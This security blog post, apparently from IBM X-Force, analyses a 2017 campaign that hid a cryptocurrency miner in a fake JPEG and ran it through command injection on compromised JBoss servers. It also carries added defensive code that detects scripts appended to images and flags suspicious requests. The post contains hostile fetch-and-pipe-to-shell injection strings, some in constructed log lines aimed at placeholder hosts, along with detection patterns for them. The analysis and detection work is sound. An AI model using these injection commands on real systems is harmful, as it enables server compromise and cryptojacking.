Steganography, or the practice of concealing a file, message, image or video within another file, message, image or video, may be an older technique, but it continues to be an incredibly versatile and effective method for obscuring or hiding information in plain sight. In 2017, IBM X-Force identified three different malware samples in network attacks containing cryptocurrency CPU-mining tools hidden within fake image files.

In September 2017, IBM X-Force reported a sixfold increase in these types of attacks. The X-Force team identified the use of steganography to hide embedded mining tools via command injection (CMDi) attacks detected by IBM Security’s managed intrusion detection and prevention system (IDPS) service. Cybercriminals continue to use steganography, likely because it is easy to convince users to open images without prompting suspicion.

Below is an analysis of the most prevalent of the three malware samples used in the attacks. Although only one sample is analyzed here, the others resemble it in the way they work. We have included indicators of compromise (IoCs) for all three samples nonetheless.

Hiding in Plain Sight

The most prevalent malware sample in the attack examples analyzed by X-Force uses steganography to hide malicious code inside an image file called fantasy-938617.jpg.

The following URL path is the value detected by the IBM X-Force command injection rule:

Attackers often abuse legitimate services, such as free image hosting services that allow users to post images to different platforms. This can allow the attacker to spread malware from a variety of legitimate sources to multiple users.

The file fantasy-938617.jpg in the URL above is the fake image and the string dd+skip=2931+bs=1|sh that follows it is an instruction for the targeted endpoint/server to convert and execute the malicious code as shell code.

The targeted system in this case is the JBoss application server as identified by the URL path /jexws4/jexws4.jsp. The JavaScript file jexws4.jsp is not native to JBoss software — it’s actually a component of the JexBoss exploit tool. JexBoss is a tool for testing and exploiting Java deserialization vulnerabilities in JBoss application servers. If JexBoss is resident on the target machine, it would indicate that the server is compromised and will allow shell commands to be executed. In this case, the attacker most likely scanned for JBoss application servers that had already been compromised and then conducted a CMDi attack.

Now, let’s break down the components of the string dd+skip=2931+bs=1|sh:

  • dd is a Linux tool used for copying and converting files into other formats.
  • skip moves the current pointer of the input stream. The malware author uses skip to force the server to ignore data at the beginning of the input stream and move directly to the embedded malicious code.
  • The file has a valid image header, and the image data below it actually displays an image. The image file is transferred to the victim using command line URL (cURL) with instructions to skip to the position in the file where the shell code begins.
  • |sh executes the code that is piped to the system shell according to the schedule set in the crontab.
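As an added example (not code from the original post), here is a defender-side check for the mechanism broken down above: it walks a JPEG's segment structure to find where the image really ends, reports any bytes stored past the EOI marker, and flags trailers that look like shell script. With dd's bs=1, the reported offset is exactly the skip= value the injected command would carry. The sample JPEG and its trailer are constructed inline.

```python
import re

SOS, EOI = 0xDA, 0xD9

def jpeg_image_end(data: bytes) -> int:
    """Offset just past the JPEG EOI marker, found by walking the segment
    structure (not by trusting the last FF D9 byte pair in the file)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == EOI:
            return pos + 2
        pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")  # skip segment body
        if marker == SOS:
            # Entropy-coded scan data runs until a marker that is neither a
            # stuffed FF 00 byte nor a restart marker FF D0..D7.
            while pos + 1 < len(data):
                if data[pos] == 0xFF and data[pos + 1] not in (0x00, *range(0xD0, 0xD8)):
                    break
                pos += 1
    raise ValueError("EOI marker not found")

def appended_payload(data: bytes):
    """(offset, trailing bytes) for anything stored after the image, else None.
    With dd's bs=1 the offset equals the skip= value that reaches the trailer."""
    end = jpeg_image_end(data)
    return (end, data[end:]) if end < len(data) else None

SHELL_HINTS = re.compile(rb"^#!\s*/bin/(ba)?sh|\b(curl|wget|crontab)\b", re.M)

def is_suspicious_image(data: bytes) -> bool:
    """Flag a JPEG whose trailer looks like shell script rather than stray padding."""
    found = appended_payload(data)
    return found is not None and SHELL_HINTS.search(found[1]) is not None

# Constructed carrier: minimal JPEG skeleton (SOI, APP0, one SOS scan containing a
# stuffed FF 00 and an RST0 marker, EOI) plus a harmless stand-in trailer script.
_APP0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
_SOS = b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
SAMPLE_JPEG = b"\xff\xd8" + _APP0 + _SOS + b"\x12\xff\x00\x34\xff\xd0\x56" + b"\xff\xd9"
SAMPLE_TRAILER = b"#!/bin/sh\necho 'constructed stand-in for the appended script'\n"
SAMPLE_FILE = SAMPLE_JPEG + SAMPLE_TRAILER
```

Run over real files, a non-empty trailer is worth a look on its own; the shell heuristic only ranks which ones to open first.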

This is the image displayed to the victim:

Below is a partial capture of the code behind the image:

Below is the beginning of the script and where the skip points to begin execution. The code prior to this script is the .jpg image.

The function DoMiner() represents the start of the code that executes a coin miner malware. After the malware is installed, the victim’s endpoint becomes a slave in a botnet that mines cryptocurrency for a cybercriminal.

Not Steganography’s First Time at the Rodeo

There are many older examples of cybercriminals using steganography to carry out their malicious deeds. The Stegoloader backdoor Trojan, for one, has been plaguing victims for more than five years. In early 2015, the Vawtrak malware used steganography to hide update files in favicons, which are small icon files associated with a particular website or webpage. The Stegano campaign, launched in late December 2016, used steganography to hide malvertising, or malware in banner ads.

More recently, IBM X-Force discovered a small-scale malware campaign involving a Neutrino bot dropping a payload that contained two Zeus malware breeds: Atmos and Zberp. The Zberp Trojan uses steganography to hide its configuration file.

Detecting Malicious Steganography

The delivery mechanism for all three malware samples analyzed was command injection, which was also the catalyst for their detection. However, as indicated earlier, steganography has been used with a variety of delivery methods, and detection of this technique can be tricky since it may not always be possible through network rules alone.

For example, our CMDi rule detected the skip instructions in the samples analyzed; however, network rules wouldn’t detect the code behind the image. Attackers’ use of the steganography toolkit StegoSploit demonstrates the additional need for behavioral analytics. An attacker can use the toolkit to embed malicious code within an image and perform a drive-by download attack to deliver the malware to the victim.
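To illustrate the point that a network rule can catch the dd/skip instruction but not the contents of the image, here is an added example (not X-Force's rule) that applies constructed detection patterns to constructed access-log lines; the hosts and the cmd parameter name are placeholders, while the /jexws4/jexws4.jsp path and the dd+skip=2931+bs=1|sh string come from the post. The plain fetch of fantasy-938617.jpg in the third line produces no hit, which is the gap that file-level or sandbox analysis has to close.

```python
import re
from urllib.parse import unquote_plus

# Detection heuristics constructed for this example (not X-Force's rule text).
JEXBOSS_SHELL = re.compile(r"/jexws4/jexws4\.jsp", re.I)
DD_SKIP_TO_SHELL = re.compile(r"\bdd\b[^|;]*\bskip=\d+[^|;]*\|\s*(ba)?sh\b", re.I)
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b", re.I)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify_request(target: str):
    """Reasons a request target looks like CMDi abuse of an image-hosted payload."""
    decoded = unquote_plus(target)  # '+' -> space, %7C -> '|': what the shell sees
    reasons = []
    if JEXBOSS_SHELL.search(decoded):
        reasons.append("jexboss-webshell-path")
    if DD_SKIP_TO_SHELL.search(decoded):
        reasons.append("dd-skip-piped-to-shell")
    if FETCH_TO_SHELL.search(decoded):
        reasons.append("download-piped-to-shell")
    return reasons

def scan_access_log(lines):
    """(line number, reasons) for every combined-format log line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append((n, reasons))
    return hits

# Constructed log lines with placeholder hosts; the first mirrors the request
# described in the post, the third is an ordinary download of the same image.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Sep/2017:10:01:02 +0000] "GET /jexws4/jexws4.jsp?cmd=curl+http://img.example.invalid/fantasy-938617.jpg%7Cdd+skip=2931+bs=1%7Csh HTTP/1.1" 200 512',
    '203.0.113.7 - - [20/Sep/2017:10:01:09 +0000] "GET /cgi-bin/ping.cgi?host=127.0.0.1;wget+http://img.example.invalid/u.sh|sh HTTP/1.1" 200 77',
    '198.51.100.4 - - [20/Sep/2017:10:02:00 +0000] "GET /images/fantasy-938617.jpg HTTP/1.1" 200 5727',
]
```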

To increase the detection capabilities of malware hiding via steganography, enterprises may want to invest in a malware sandbox that can provide behavior-based analysis and work as part of an integrated security immune system. Integration with network protection and a threat intelligence platform can help analysts keep track of what’s important when it comes to identifying evasive malware.

Sample IoCs

Below are IoCs for each of the malware samples analyzed. Please access our X-Force Exchange collection for additional information.

Filename: logo.jpg

  • MD5: b310fd27ce633c4220b2c832db3a5f79
  • SHA1: f229cb063f546ec02742d3b7e52815b6caa56d2d
  • SHA256: 28452dc29d86bcc21e8a98920484e235ff0e88f42283a16b9b6a9aea75b62366
  • File Size: 1.4 KB (1408 bytes)
  • Source IP:

Filename: 58837466f1237.jpg, test123

  • MD5: 08f7eac49ffedc720844338290dab1ec
  • SHA1: 179f62b0a505c889d865e8feff7f59379e4ed885
  • SHA256: 62e0b77235665a15aa44c4b6e0da80b87fad33803a201d18db8871f4abb0d2c2
  • ssdeep: 24576:dEX3yP0ghoMApslmzW2B2zMPpoOabQuq0+wn4d8OJjfaMRG:Ctgvu4qyq0+w4fJjfw
  • File Size: 1.2 MB (1220610 bytes)
  • File Type: JPEG
  • Source IP:

Filename: fantasy-938617.jpg

  • MD5: 4e13b60a707d1159230b140c9059b9c4
  • SHA1: c67190b1281e7ca606de6dacd7147990398ce2b3
  • SHA256: 6a6a8c0888d9187a6c19c5e12535534990f646e1397b06be4a054c9789a08f3f
  • ssdeep: 96:ArbWsYZQpswDH+6FrxxjujFYmhQT1OuUZoGQT5VO0s:AyZAsyHPFrzAYZ1ORoVT5E
  • File Size: 5.6 KB (5727 bytes)
  • File Type: JPEG
  • Source IP:
